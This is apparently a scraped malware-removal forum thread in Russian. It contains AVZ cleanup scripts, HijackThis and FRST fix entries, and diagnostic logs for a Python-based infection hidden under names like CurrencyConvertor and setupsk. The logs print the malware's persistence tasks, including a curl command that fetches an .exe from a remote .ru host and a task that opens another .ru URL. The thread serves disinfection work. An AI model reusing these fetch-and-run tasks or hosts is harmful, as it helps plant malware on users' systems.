178.132.6.57
193.238.153.54
35.177.46.238
46.101.28.31
82.202.226.203
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '');
QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '');
DeleteFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '64');
DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '64');
DeleteFile('C:\WINDOWS\system32\Tasks\{704B1058-6981-4DFF-B521-E0E3DEA27878}', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\curl', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\curls', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor2', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\cyyMvLzPGa', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\Scheduled Update S-1-8-22', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\setupsk', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\setupsk_upd', 'x64');
DeleteFile('C:\WINDOWS\system32\Tasks\xWwMI', 'x64');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "cyyMvLzPGa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Scheduled Update S-1-8-22" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "setupsk" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "xWwMI" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true);
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} [SuggestionsURLFallback] = http://clients5.google.com/complete/search?q={searchTerms}&hl={language}&gl={language}&client=ie8&mw={ie:maxWidth}&sh={ie:sectionHeight}&rh={ie:rowHeight}&inputencoding={inputEncoding}&outputencoding={outputEncoding} - Google
O2 - HKLM\..\BHO: (no name) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (disabled) Scheduled Update S-1-8-22 - C:\WINDOWS\explorer.exe http://rokomi.ru
O22 - Task: CurrencyConvertor - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py" --APPNAME="CurrencyConvertor" (file missing)
O22 - Task: CurrencyConvertor2 - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py" (file missing)
O22 - Task: curl - C:\Users\Zo_rick\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe
O22 - Task: curls - C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task: cyyMvLzPGa - C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat (file missing)
O22 - Task: setupsk - C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py" --APPNAME="setupsk" (file missing)
O22 - Task: setupsk_upd - C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd" (file missing)
O22 - Task: xWwMI - C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat (file missing)
Start::
CreateRestorePoint:
VirusTotal: C:\Program Files (x86)\SCM\SCM.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
2017-12-06 22:55 - 2017-09-29 16:42 - 000000070 _____ () C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA
2017-12-06 22:55 - 2017-09-29 16:42 - 000000072 _____ () C:\Users\Zo_rick\AppData\Local\vymftvIiGM
2017-12-06 22:55 - 2017-12-06 22:55 - 000000001 _____ () C:\Users\Zo_rick\AppData\Local\WMI.ini
2017-12-06 22:55 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk
2017-09-29 16:42 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk.bat
2017-12-06 22:55 - 2017-09-29 16:42 - 000001198 _____ () C:\Users\Zo_rick\AppData\Local\gUnfaSrsnCv
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {A7194199-4471-4E71-975F-96481AD14A85} - \{704B1058-6981-4DFF-B521-E0E3DEA27878} -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\PACE:3B3F2425358D33BE [217]
AlternateDataStreams: C:\Users\Все пользователи\PACE:3B3F2425358D33BE [217]
EmptyTemp:
Reboot:
End::
# AdwCleaner 7.0.5.0 - Logfile created on Mon Dec 11 06:31:34 2017
Какой именно процесс, не заметили?частенько нагружается цп до 80
Сейчас тестируем новую версию автологера с новой версией AVZ на борту. Сейчас базы не обновляются.В меню надпись обновление баз не является активным, не могу нажать.
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?